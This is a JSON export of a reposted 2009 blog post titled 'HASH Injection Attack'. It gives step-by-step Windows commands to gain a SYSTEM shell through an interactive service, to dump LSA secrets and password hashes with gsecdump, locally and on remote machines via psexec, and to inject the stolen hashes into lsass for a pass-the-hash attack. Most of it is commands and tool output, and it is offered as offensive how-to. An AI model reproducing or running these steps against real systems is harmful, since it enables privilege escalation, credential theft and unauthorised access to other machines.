{"id":106,"date":"2009-07-10T19:15:11","date_gmt":"2009-07-10T19:15:11","guid":{"rendered":""},"modified":"2011-11-18T16:59:49","modified_gmt":"2011-11-18T08:59:49","slug":"106","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/106.html","title":{"rendered":"HASH Injection Attack"},"content":{"rendered":"<p><span style=\"font-size: x-small;\">This article is reposted from: <a href=\"http:\/\/forum.eviloctal.com\/thread-34966-1-2.html\">http:\/\/forum.eviloctal.com\/thread-34966-1-2.html<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: x-small;\">To get a DOS Prompt as NT system: <\/span><\/p>\n<p>C:\\&gt;sc create shellcmdline binpath= \"C:\\WINDOWS\\system32\\cmd.exe \/K start\" type= own type= interact<br \/>\n[SC] CreateService SUCCESS<\/p>\n<p>C:\\&gt;sc start shellcmdline<br \/>\n[SC] StartService FAILED 1053:<\/p>\n<p>The service did not respond to the start or control request in a timely fashion.<\/p>\n<p>C:\\&gt;sc delete shellcmdline<br \/>\n[SC] DeleteService SUCCESS<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>Then in the new DOS window:<\/p>\n<p>Microsoft Windows XP [Version 5.1.2600]<br \/>\n(C) Copyright 1985-2001 Microsoft Corp.<\/p>\n<p>C:\\WINDOWS\\system32&gt;whoami<br \/>\nNT AUTHORITY\\SYSTEM<\/p>\n<p>C:\\WINDOWS\\system32&gt;gsecdump -h<br \/>\ngsecdump v0.6 by Johannes Gumbel (<a href=\"mailto:johannes.gumbel@truesec.se\"><span style=\"font-size: x-small;\">johannes.gumbel@truesec.se<\/span><\/a><span style=\"font-size: x-small;\">)<br \/>\nusage: gsecdump [options] <\/span><\/p>\n<p>options:<br \/>\n-h [ --help ] show help<br \/>\n-a [ --dump_all ] dump all secrets<br \/>\n-l [ --dump_lsa ] dump lsa secrets<br \/>\n-w [ --dump_wireless ] dump microsoft wireless connections<br \/>\n-u [ --dump_usedhashes ] dump hashes from active logon sessions<br \/>\n-s [ --dump_hashes ] dump hashes from SAM\/AD<\/p>\n<p>Although I like to use:<\/p>\n<p>PsExec v1.83 &#8211; Execute processes remotely<br \/>\nCopyright (C) 2001-2007 Mark Russinovich<br \/>\nSysinternals &#8211; <a href=\"http:\/\/www.sysinternals.com\/\" target=\"_blank\"><span style=\"font-size: x-small;\">www.sysinternals.com<\/span><\/a><\/p>\n<p>C:\\&gt;psexec \\\\COMPUTER -u user -p password -s -f -c gsecdump.exe -u &gt;Active-HASH.TXT<\/p>\n<p>to get the hashes from active logon sessions of a remote system.<\/p>\n<p>These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.<\/p>\n<p>A tip: you can use iam from the pshtools toolkit to import the HASH information just dumped with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM\/NT hashes captured during ARP spoofing, and those obtained with gethash, actually never need to be cracked at all; this is simply a matter of using the tools. As the original article puts it, whether the password is 4 characters or 127 characters long, once you have the hash it is 100% done.<br \/>\nOriginal source: <a href=\"http:\/\/truesecurity.se\/blogs\/murray\/archive\/2007\/03\/16\/why-an-exposed-lm-ntlm-hash-is-comparable-to-a-clear-text-password.aspx\" target=\"_blank\"><span style=\"font-size: x-small;\">http:\/\/truesecurity.se\/blogs\/mur &#8230; -text-password.aspx<\/span><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This article is reposted from: http:\/\/forum.eviloctal.com\/thread- &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/106.html\">Continue reading &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[120,94],"class_list":["post-106","post","type-post","status-publish","format-standard","hentry","tag-hash","tag-94"],"views":846,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=106"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/106\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=106"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}